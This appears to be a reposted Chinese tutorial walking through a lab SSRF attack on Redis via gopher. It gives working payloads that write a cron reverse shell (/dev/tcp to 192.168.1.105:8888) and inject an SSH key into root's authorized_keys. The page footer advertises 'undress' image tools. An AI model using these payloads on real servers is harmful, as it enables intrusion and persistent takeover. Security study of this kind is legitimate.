搜尋
首頁資料庫RedisRedis中服務端請求偽造SSRF的範例分析

SSRF,即服務端請求偽造。使用者可以控制伺服器請求的資源、協定、路徑等。即可造成SSRF攻擊。

本文著重研究透過 gopher協定 ,對 Redis服務 進行SSRF攻擊,進而getshell。

gopher協定格式

首先先了解gopher協定為何物,格式是什麼樣子:

gopher://: //_後接TCP資料流

在我們測試攻擊redis時,可以使用linux 自帶的curl進行測試。

如果使用Centos,為了確保實驗成功,最好將 Centos的 selinux關閉。

關閉selinux:

setenforce 0

#攻擊redis

(1)實驗環境建構

虛擬機台Centos7即可。

redis安裝:

wget http://download.redis.io/releases/redis-4.0.6.tar.gz  //下載redis壓縮包

yum install gcc //安裝make時必備的gcc

tar -xzvf redis-4.0.6.tar.gz //解壓縮壓縮包cd redis-4.0.6 //進入壓縮包目錄

make MALLOC=libc //編譯

cd src //編譯完成後會產生一個資料夾src,進入src資料夾

make install //安裝

redis運行:

redis-4.0.6 目錄下,redis.conf 是最初始的redis設定檔

#redis-4.0.6/src 目錄下,有兩個最重要的執行檔:

redis-server -- 服務端

redis-cli -- 用戶端

直接執行服務端程序,即可開啟redis 服務。

./redis-server

Redis中服務端請求偽造SSRF的範例分析

直接執行客戶端程序,預設連接本地的redis服務:

./redis-cli

(2)初探與介紹

嘗試攻擊無密碼的Redis:

首先我們得開啟抓包軟體,擷取與redis通訊的封包。

在Linux中,可以用tcpdump來抓流量:

tcpdump -i lo -s 0 port 6379 -w redis.pcap

若是抓本地介面的流量,注意是lo不是eth0

我們先登錄,然後執行set key操作:

Redis中服務端請求偽造SSRF的範例分析

將tcpdump抓到的包導出來,用wireshark打開,追蹤TCP流

只看我們輸入的數據,不看服務端傳回的數據,可以看到只有幾行:

Redis中服務端請求偽造SSRF的範例分析

在「顯示和儲存數據為」這一位置,選擇Hex轉儲,將會得到如下的數據:

Redis中服務端請求偽造SSRF的範例分析

其中畫紅色框的就是一會用到的payload

將所有東西都複製出來,使用編輯器去掉除了紅框以外的所有無關資料

Redis中服務端請求偽造SSRF的範例分析

然後給每個十六進位值前加上一個百分號,排成一行即可:

Redis中服務端請求偽造SSRF的範例分析

建構curl 請求:

curl -v 'gopher://127.0.0.1:6379/_%2a%31%0d%0a%24%37%0d%0a%43%4f%4d%4d%41%4e%44%0d%0a%2a%33%0d%0a%24%33%0d%0a%73%65%74%0d%0a%24%34%0d%0a%6b%65%79%31%0d%0a%24%36%0d%0a%76%61%6c%75%65%31%0d%0a' --output -

回顯:

Redis中服務端請求偽造SSRF的範例分析

查詢key:

Redis中服務端請求偽造SSRF的範例分析

可以成功設定key。

嘗試攻擊使用密碼的redis:

先設定redis為需要密碼登入:

修改redis下的設定檔 redis. conf,搜尋requirepass 關鍵字。

預設requirepass 是被註解的,將註解符號刪除,再在requirepass 後面填入想要給redis 設定的密碼

Redis中服務端請求偽造SSRF的範例分析

配置好後啟動redis 的指令為:

./redis-server redis配置文件路径

Redis中服務端請求偽造SSRF的範例分析

嘗試攻擊有密碼redis:

首先,開啟tcpdump抓包,然後在redis命令列中執行操作:

Redis中服務端請求偽造SSRF的範例分析

重新抓流量,和之前一樣操作,發現密碼驗證也就是加多了一個auth指令:

Redis中服務端請求偽造SSRF的範例分析

重复上文的步骤即可。

(2)GetShell:

接下来讲重点:通过 set key GetShell:

思路:

(1)将反弹shell命令写到定时任务里,攻击机只需要开一个netcat端口即可。

(2)写入ssh-keygen,进行ssh免密登录。

一个个细细道来。

(1)定时任务反弹shell

基本要求:

redis需要是以 root 权限运行,不然写不到 /var/spool/cron/ 目录下

1.首先得知道 Linux 下的定时任务是个什么东西:

Linux下设置定时任务命令为 crontab

配置文件为 /etc/crontab

下面这张图是配置文件里的内容,很好的说明了 crontab 配置的格式

Redis中服務端請求偽造SSRF的範例分析

这个配置文件应该只是供参考用的,我们的定时任务需要自己手动写在 /var/spool/cron/ 目录下

如果我们要每分钟执行一次命令 echo1 > /tmp/1.txt

则可以这么操作:

vim /var/spool/cron/root //root是文件名,一般以执行的用户命名

在文件中写入

* * * * * root echo1 > /tmp/1.txt

保存退出后,重启 crontab 服务:

systemctl restart crond.service

即可每一分钟执行一次该命令

2.接着要知道linux下通过输入输出流反弹shell

 命令:

/bin/bash -i >& /dev/tcp/192.168.1.105/8888 0>&1

 直接看效果:Redis中服務端請求偽造SSRF的範例分析

Redis中服務端請求偽造SSRF的範例分析

这里巧妙的结合了Linux中 文件描述符、重定向符和 /dev/

文件描述符 1 表示标准输入

文件描述符 2 表示标准输出

/bin/bash -i 表示的是调用bash命令的交互模式,并将交互模式重定向到 /dev/tcp/192.168.1.105/8888 中。

重定向时加入一个描述符 &,表示直接作为数据流输入。不加 & 时,重定向默认是输出到文件里的。

做个实例就清晰明了了

Redis中服務端請求偽造SSRF的範例分析

/dev/tcp/ip地址/端口号 是linux下的特殊文件,表示对这个地址端口进行tcp连接

这里我们设置成攻击机监听的地址

最后面的 0>&1 。此时攻击机和靶机已经建立好了连接,攻击机的输入就是从标准输入0传送至靶机

通过重定向符,重定向到 1(标准输入)中,由于是作为 /bin/bash 的标准输入,所以就执行了系统命令了。

3.还需要知道Redis如何写入文件

Redis 中可以导出当前数据库中的 key 和 value

并且可以通过命令配置导出路径和文件名:

config set dir /tmp/test      //设置导出路径
config set dbfilename root    //设置导出文件名
save                          //执行导出操作

Redis中服務端請求偽造SSRF的範例分析

Redis中服務端請求偽造SSRF的範例分析

可以看到,格式非常乱。不过还好linux中的cron不会报错,只要读到一行正确配置即可执行。

通过crontab定时任务 getshell

为了能让linux能够正确读到一行,我们在 set key 的时候手动添加 \n(换行)

redis语句:

config set dir /var/spool/cron
config set dbfilename root
set test1 "\n\n\n* * * * * /bin/bash -i >& /dev/tcp/192.168.1.105/8888 0>&1\n\n\n"
save

转换成 gopher协议,进行curl请求:

Redis中服務端請求偽造SSRF的範例分析

成功写入:

Redis中服務端請求偽造SSRF的範例分析

成功getshell:

Redis中服務端請求偽造SSRF的範例分析

注意:这里有一个坑点。

cron文件不需要写用户名,不然会报错:

Redis中服務端請求偽造SSRF的範例分析

Redis中服務端請求偽造SSRF的範例分析

(2)ssh免密登录

在linux中,ssh可配置成免密登录。

需要修改 ssh 配置文件 /etc/ssh/sshd_config

#StrictModes yes

改为

StrictModes no

然后重启sshd即可

免密登录条件:

客户端生成公钥和私钥

将公钥上传至服务端 即可

在SSRF利用中,同样需要root权限运行 redis

如果不是root权限,需要能够 ssh 登录的用户权限运行 redis

正常免密登录流程:

1.客户端先生成公钥和私钥

使用工具 ssh-keygen:

ssh-keygen -t rsa

Redis中服務端請求偽造SSRF的範例分析

执行完毕后将会在 用户家目录中的 .ssh文件夹中放有公钥与私钥 文件

有.pub后缀的就是公钥,没有.pub后缀的就是私钥

Redis中服務端請求偽造SSRF的範例分析

2.上传公钥至服务器

将公钥上传至服务端的 /root/.ssh目录下

嫌麻烦可以用 ssh-copy-id工具

Redis中服務端請求偽造SSRF的範例分析

Redis中服務端請求偽造SSRF的範例分析

3.重命名文件为authorized_keys

文件名要重命名为 authorized_keys

authorized_keys 文件内容如下:

Redis中服務端請求偽造SSRF的範例分析

如果有多台客户端需要免密登录,新起一行,新行中写对应的客户端的公钥值即可

类似这样:

Redis中服務端請求偽造SSRF的範例分析

4.免密登录

传好后即可免密登录:

Redis中服務端請求偽造SSRF的範例分析

ssh免密登录 getshelll

我们知道了要写入的文件位置、要写入的内容(公钥事先生成好),我们可以构造redis语句了:

//先配置路径
config set dir /root/.ssh      
config set dbfilename authorized_keys
//写入公钥
set test2 "\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC/unZTA0b1HtFsgjXlWM4Bt65Ubx72z/dkLJrqCJJpfsD+F27uix6J3GWuIKaHurabFR40eJ2EqWWs/FCKpBvnJ+msSWWyn9C8WyWY19HydE9ldIO8SjdoOfQ7pf0Q2dwMKSr6F3L8Dy04ULQsCwGEu8X0fdwCZIggagTwGXWZS/M89APJKSVn7v5jhgRy/dCSGwN5wwFakSQSbWtW396V/iP2svU7IAznqIX4tyZII/DX1751LqA0ufVzIoK1Sc9E87swjupDD4ZGxX6ks676JYQHdZSYHoQioM9kWVsB2ntBfBsIFHu+yX1V9tkTTB0E5eaWuitzzsi8xfAz0xBag3f8wiPvlbuLV/TwOXHABGt1HQNhg5wnfZYnebRNdn5QeDXNY1XtLjc3T9UTYe7FmT6hG+RvI+7OSywDIvaGq+PjAQN1KPOBFJtNG5iha3bYds05zR5LCM8ZzLRTcKP9Djo79fum8iOC8DjrxVp49RilDobr1/oZzn+91YJIq1M= root@kali\n\n\n"
//保存
save

改成gopher协议格式: 

Redis中服務端請求偽造SSRF的範例分析

查看 authorized_keys 文件:

Redis中服務端請求偽造SSRF的範例分析 

成功免密登录:

Redis中服務端請求偽造SSRF的範例分析

以上是Redis中服務端請求偽造SSRF的範例分析的詳細內容。更多資訊請關注PHP中文網其他相關文章!

陳述
本文轉載於:亿速云。如有侵權,請聯絡admin@php.cn刪除
REDIS:探索其功能和功能REDIS:探索其功能和功能Apr 19, 2025 am 12:04 AM

Redis脫穎而出是因為其高速、多功能性和豐富的數據結構。 1)Redis支持字符串、列表、集合、散列和有序集合等數據結構。 2)它通過內存存儲數據,支持RDB和AOF持久化。 3)從Redis6.0開始引入多線程處理I/O操作,提升了高並發場景下的性能。

Redis是SQL還是NOSQL數據庫?答案解釋了Redis是SQL還是NOSQL數據庫?答案解釋了Apr 18, 2025 am 12:11 AM

RedisisclassifiedasaNoSQLdatabasebecauseitusesakey-valuedatamodelinsteadofthetraditionalrelationaldatabasemodel.Itoffersspeedandflexibility,makingitidealforreal-timeapplicationsandcaching,butitmaynotbesuitableforscenariosrequiringstrictdataintegrityo

REDIS:提高應用程序性能和可擴展性REDIS:提高應用程序性能和可擴展性Apr 17, 2025 am 12:16 AM

Redis通過緩存數據、實現分佈式鎖和數據持久化來提升應用性能和可擴展性。 1)緩存數據:使用Redis緩存頻繁訪問的數據,提高數據訪問速度。 2)分佈式鎖:利用Redis實現分佈式鎖,確保在分佈式環境中操作的安全性。 3)數據持久化:通過RDB和AOF機制保證數據安全性,防止數據丟失。

REDIS:探索其數據模型和結構REDIS:探索其數據模型和結構Apr 16, 2025 am 12:09 AM

Redis的數據模型和結構包括五種主要類型:1.字符串(String):用於存儲文本或二進制數據,支持原子操作。 2.列表(List):有序元素集合,適合隊列和堆棧。 3.集合(Set):無序唯一元素集合,支持集合運算。 4.有序集合(SortedSet):帶分數的唯一元素集合,適用於排行榜。 5.哈希表(Hash):鍵值對集合,適合存儲對象。

REDIS:對其數據庫方法進行分類REDIS:對其數據庫方法進行分類Apr 15, 2025 am 12:06 AM

Redis的數據庫方法包括內存數據庫和鍵值存儲。 1)Redis將數據存儲在內存中,讀寫速度快。 2)它使用鍵值對存儲數據,支持複雜數據結構,如列表、集合、哈希表和有序集合,適用於緩存和NoSQL數據庫。

為什麼要使用redis?利益和優勢為什麼要使用redis?利益和優勢Apr 14, 2025 am 12:07 AM

Redis是一個強大的數據庫解決方案,因為它提供了極速性能、豐富的數據結構、高可用性和擴展性、持久化能力以及廣泛的生態系統支持。 1)極速性能:Redis的數據存儲在內存中,讀寫速度極快,適合高並發和低延遲應用。 2)豐富的數據結構:支持多種數據類型,如列表、集合等,適用於多種場景。 3)高可用性和擴展性:支持主從復制和集群模式,實現高可用性和水平擴展。 4)持久化和數據安全:通過RDB和AOF兩種方式實現數據持久化,確保數據的完整性和可靠性。 5)廣泛的生態系統和社區支持:擁有龐大的生態系統和活躍社區,

了解NOSQL:Redis的關鍵特徵了解NOSQL:Redis的關鍵特徵Apr 13, 2025 am 12:17 AM

Redis的關鍵特性包括速度、靈活性和豐富的數據結構支持。 1)速度:Redis作為內存數據庫,讀寫操作幾乎瞬時,適用於緩存和會話管理。 2)靈活性:支持多種數據結構,如字符串、列表、集合等,適用於復雜數據處理。 3)數據結構支持:提供字符串、列表、集合、哈希表等,適合不同業務需求。

REDIS:確定其主要功能REDIS:確定其主要功能Apr 12, 2025 am 12:01 AM

Redis的核心功能是高性能的內存數據存儲和處理系統。 1)高速數據訪問:Redis將數據存儲在內存中,提供微秒級別的讀寫速度。 2)豐富的數據結構:支持字符串、列表、集合等,適應多種應用場景。 3)持久化:通過RDB和AOF方式將數據持久化到磁盤。 4)發布訂閱:可用於消息隊列或實時通信系統。

See all articles

熱AI工具

Undresser.AI Undress

Undresser.AI Undress

人工智慧驅動的應用程序,用於創建逼真的裸體照片

AI Clothes Remover

AI Clothes Remover

用於從照片中去除衣服的線上人工智慧工具。

Undress AI Tool

Undress AI Tool

免費脫衣圖片

Clothoff.io

Clothoff.io

AI脫衣器

AI Hentai Generator

AI Hentai Generator

免費產生 AI 無盡。

熱工具

MantisBT

MantisBT

Mantis是一個易於部署的基於Web的缺陷追蹤工具,用於幫助產品缺陷追蹤。它需要PHP、MySQL和一個Web伺服器。請查看我們的演示和託管服務。

SublimeText3 Linux新版

SublimeText3 Linux新版

SublimeText3 Linux最新版

SublimeText3漢化版

SublimeText3漢化版

中文版,非常好用

Atom編輯器mac版下載

Atom編輯器mac版下載

最受歡迎的的開源編輯器

SublimeText3 Mac版

SublimeText3 Mac版

神級程式碼編輯軟體(SublimeText3)